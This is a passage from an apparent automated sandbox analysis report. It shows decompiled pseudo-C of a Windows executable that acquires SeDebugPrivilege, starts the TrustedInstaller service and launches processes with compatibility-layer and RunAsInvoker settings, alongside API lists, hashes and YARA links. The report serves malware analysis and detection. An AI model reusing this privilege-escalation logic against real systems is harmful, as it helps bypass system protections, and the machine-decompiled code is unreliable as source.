                                                                                                        • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                        • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                        • API String ID: 616250965-1253513912
                                                                                                        • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                        • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                        • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                        • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38serviceCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}








                                                                                                        0x00401319
                                                                                                        0x0040131b
                                                                                                        0x00401327
                                                                                                        0x0040132b
                                                                                                        0x0040133a
                                                                                                        0x0040134b
                                                                                                        0x0040134b
                                                                                                        0x0040134e
                                                                                                        0x0040134e
                                                                                                        0x00401353
                                                                                                        0x0040135b

                                                                                                        APIs
                                                                                                        • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                        • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                        • String ID: TrustedInstaller
                                                                                                        • API String ID: 862991418-565535830
                                                                                                        • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                        • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                        • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                        • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                                                        0x0040a348
                                                                                                        0x0040a34e
                                                                                                        0x0040a352
                                                                                                        0x0040a35f
                                                                                                        0x0040a363
                                                                                                        0x0040a369
                                                                                                        0x0040a371
                                                                                                        0x0040a374
                                                                                                        0x0040a37c
                                                                                                        0x0040a380
                                                                                                        0x0040a383
                                                                                                        0x0040a386
                                                                                                        0x0040a388
                                                                                                        0x0040a388
                                                                                                        0x0040a38c
                                                                                                        0x0040a38f
                                                                                                        0x0040a39f
                                                                                                        0x0040a3a1
                                                                                                        0x0040a3a5
                                                                                                        0x0040a3a5
                                                                                                        0x0040a3a9
                                                                                                        0x0040a3aa
                                                                                                        0x0040a3b3
                                                                                                        0x0040a3b3
                                                                                                        0x0040a37c
                                                                                                        0x0040a371
                                                                                                        0x0040a3b8
                                                                                                        0x0040a3be

                                                                                                        APIs
                                                                                                        • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                        • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                        • String ID:
                                                                                                        • API String ID: 3473537107-0
                                                                                                        • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                        • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                        • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                        • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 83%
                                                                                                        			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

































































                                                                                                        0x004022d5
                                                                                                        0x004022dd
                                                                                                        0x004022e7
                                                                                                        0x004022ec
                                                                                                        0x004022f7
                                                                                                        0x004022fa
                                                                                                        0x004022fd
                                                                                                        0x00402300
                                                                                                        0x00402307
                                                                                                        0x0040230d
                                                                                                        0x0040230e
                                                                                                        0x00402318
                                                                                                        0x00402321
                                                                                                        0x00402324
                                                                                                        0x00402327
                                                                                                        0x0040232a
                                                                                                        0x0040232d
                                                                                                        0x00402334
                                                                                                        0x00402337
                                                                                                        0x0040233e
                                                                                                        0x0040234f
                                                                                                        0x00402356
                                                                                                        0x0040235b
                                                                                                        0x0040235e
                                                                                                        0x0040236d
                                                                                                        0x00402374
                                                                                                        0x0040237e
                                                                                                        0x00402395
                                                                                                        0x004023a0
                                                                                                        0x004023a0
                                                                                                        0x004023ac
                                                                                                        0x004023cf
                                                                                                        0x004023d2
                                                                                                        0x004023d9
                                                                                                        0x004023de
                                                                                                        0x004023f6
                                                                                                        0x00402403
                                                                                                        0x00402414
                                                                                                        0x00402419
                                                                                                        0x00402403
                                                                                                        0x0040241a
                                                                                                        0x00402423
                                                                                                        0x00402458
                                                                                                        0x0040245d
                                                                                                        0x00402464
                                                                                                        0x00402467
                                                                                                        0x00402468
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402425
                                                                                                        0x00402428
                                                                                                        0x0040242b
                                                                                                        0x00402433
                                                                                                        0x00402434
                                                                                                        0x00402473
                                                                                                        0x00402473
                                                                                                        0x0040247c
                                                                                                        0x00402481
                                                                                                        0x00402488
                                                                                                        0x00402488
                                                                                                        0x00402495
                                                                                                        0x0040249a
                                                                                                        0x004024b7
                                                                                                        0x004024be
                                                                                                        0x004024cd
                                                                                                        0x004024d1
                                                                                                        0x004024ed
                                                                                                        0x004024f0
                                                                                                        0x00402506
                                                                                                        0x0040250b
                                                                                                        0x00402512
                                                                                                        0x00402518
                                                                                                        0x00402519
                                                                                                        0x0040251e
                                                                                                        0x00402524
                                                                                                        0x00402527
                                                                                                        0x0040252b
                                                                                                        0x00402530
                                                                                                        0x00402531
                                                                                                        0x00402531
                                                                                                        0x0040253d
                                                                                                        0x0040255a
                                                                                                        0x00402561
                                                                                                        0x00402570
                                                                                                        0x00402574
                                                                                                        0x00402590
                                                                                                        0x00402593
                                                                                                        0x004025a9
                                                                                                        0x004025ae
                                                                                                        0x004025b5
                                                                                                        0x004025bb
                                                                                                        0x004025bc
                                                                                                        0x004025c1
                                                                                                        0x004025c7
                                                                                                        0x004025ca
                                                                                                        0x004025cd
                                                                                                        0x004025ce
                                                                                                        0x004025d4
                                                                                                        0x004025d4
                                                                                                        0x004025da
                                                                                                        0x004025e3
                                                                                                        0x004025eb
                                                                                                        0x00402633
                                                                                                        0x004025fb
                                                                                                        0x00402608
                                                                                                        0x0040260f
                                                                                                        0x00402614
                                                                                                        0x00402624
                                                                                                        0x00402630
                                                                                                        0x00402630
                                                                                                        0x0040263a
                                                                                                        0x0040263b
                                                                                                        0x00402646
                                                                                                        0x0040264b
                                                                                                        0x0040264c
                                                                                                        0x0040265a
                                                                                                        0x0040265a
                                                                                                        0x0040265d
                                                                                                        0x00402666
                                                                                                        0x00402668
                                                                                                        0x00402668
                                                                                                        0x00402672
                                                                                                        0x00402675
                                                                                                        0x0040267e
                                                                                                        0x0040267e
                                                                                                        0x00402683
                                                                                                        0x0040268b
                                                                                                        0x0040269e
                                                                                                        0x0040269e
                                                                                                        0x004026a3
                                                                                                        0x004026ac
                                                                                                        0x004026b5
                                                                                                        0x004026b8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004026ba
                                                                                                        0x00000000
                                                                                                        0x004026ae
                                                                                                        0x004026ae
                                                                                                        0x004026bf
                                                                                                        0x004026c1
                                                                                                        0x004026c6
                                                                                                        0x004026cc
                                                                                                        0x004026d5
                                                                                                        0x004026db
                                                                                                        0x004026e4
                                                                                                        0x004026ea
                                                                                                        0x004026f3
                                                                                                        0x004026f9
                                                                                                        0x00402707
                                                                                                        0x00402707
                                                                                                        0x0040270d
                                                                                                        0x00402710
                                                                                                        0x0040276d
                                                                                                        0x00402770
                                                                                                        0x0040280b
                                                                                                        0x0040280e
                                                                                                        0x00402813
                                                                                                        0x00402810
                                                                                                        0x00402810
                                                                                                        0x00402810
                                                                                                        0x00402819
                                                                                                        0x0040281f
                                                                                                        0x00402836
                                                                                                        0x00402841
                                                                                                        0x00402846
                                                                                                        0x0040284a
                                                                                                        0x00402851
                                                                                                        0x00402857
                                                                                                        0x00402860
                                                                                                        0x00402865
                                                                                                        0x00402876
                                                                                                        0x00402879
                                                                                                        0x00402888
                                                                                                        0x00402888
                                                                                                        0x00402857
                                                                                                        0x00402891
                                                                                                        0x0040289c
                                                                                                        0x0040289c
                                                                                                        0x00402779
                                                                                                        0x00402784
                                                                                                        0x0040278d
                                                                                                        0x004027a4
                                                                                                        0x004027b3
                                                                                                        0x004027b8
                                                                                                        0x004027bb
                                                                                                        0x004027bf
                                                                                                        0x004027c6
                                                                                                        0x004027c6
                                                                                                        0x004027d1
                                                                                                        0x004027d6
                                                                                                        0x004027d9
                                                                                                        0x004027db
                                                                                                        0x004027e2
                                                                                                        0x004027e4
                                                                                                        0x004027e4
                                                                                                        0x004027e7
                                                                                                        0x004027f4
                                                                                                        0x004027fc
                                                                                                        0x00402801
                                                                                                        0x00402801
                                                                                                        0x00402803
                                                                                                        0x00402803
                                                                                                        0x00402806
                                                                                                        0x00000000
                                                                                                        0x00402806
                                                                                                        0x00402715
                                                                                                        0x00402729
                                                                                                        0x0040272e
                                                                                                        0x00402731
                                                                                                        0x00402738
                                                                                                        0x00402738
                                                                                                        0x00402743
                                                                                                        0x00402748
                                                                                                        0x0040274d
                                                                                                        0x00402754
                                                                                                        0x00402756
                                                                                                        0x00402756
                                                                                                        0x00402759
                                                                                                        0x00402763
                                                                                                        0x00000000
                                                                                                        0x00402763
                                                                                                        0x004026fb
                                                                                                        0x00402700
                                                                                                        0x00402702
                                                                                                        0x00000000
                                                                                                        0x00402702
                                                                                                        0x004026ec
                                                                                                        0x00000000
                                                                                                        0x004026ec
                                                                                                        0x004026dd
                                                                                                        0x00000000
                                                                                                        0x004026dd
                                                                                                        0x004026ce
                                                                                                        0x00000000
                                                                                                        0x004026ce
                                                                                                        0x004026ac
                                                                                                        0x00402443
                                                                                                        0x0040246a
                                                                                                        0x00402470
                                                                                                        0x00000000
                                                                                                        0x00402470

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00402300
                                                                                                        • memset.MSVCRT ref: 0040233E
                                                                                                        • memset.MSVCRT ref: 00402356
                                                                                                          • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                          • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                        • wcschr.MSVCRT ref: 00402387
                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                          • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                          • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                        • wcschr.MSVCRT ref: 004023B7
                                                                                                        • memset.MSVCRT ref: 004023D9
                                                                                                        • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                        • wcschr.MSVCRT ref: 0040242B
                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                        • memset.MSVCRT ref: 004024BE
                                                                                                        • memset.MSVCRT ref: 004024D1
                                                                                                        • _wtoi.MSVCRT ref: 00402519
                                                                                                        • _wtoi.MSVCRT ref: 0040252B
                                                                                                        • memset.MSVCRT ref: 00402561
                                                                                                        • memset.MSVCRT ref: 00402574
                                                                                                        • _wtoi.MSVCRT ref: 004025BC
                                                                                                        • _wtoi.MSVCRT ref: 004025CE
                                                                                                        • wcschr.MSVCRT ref: 004025F0
                                                                                                        • memset.MSVCRT ref: 0040260F
                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                        • _snwprintf.MSVCRT ref: 0040264C
                                                                                                        • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                        • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                        • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                        • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                        • API String ID: 2452314994-435178042
                                                                                                        • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                        • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                        • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                        • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 89%
                                                                                                        			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12);
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
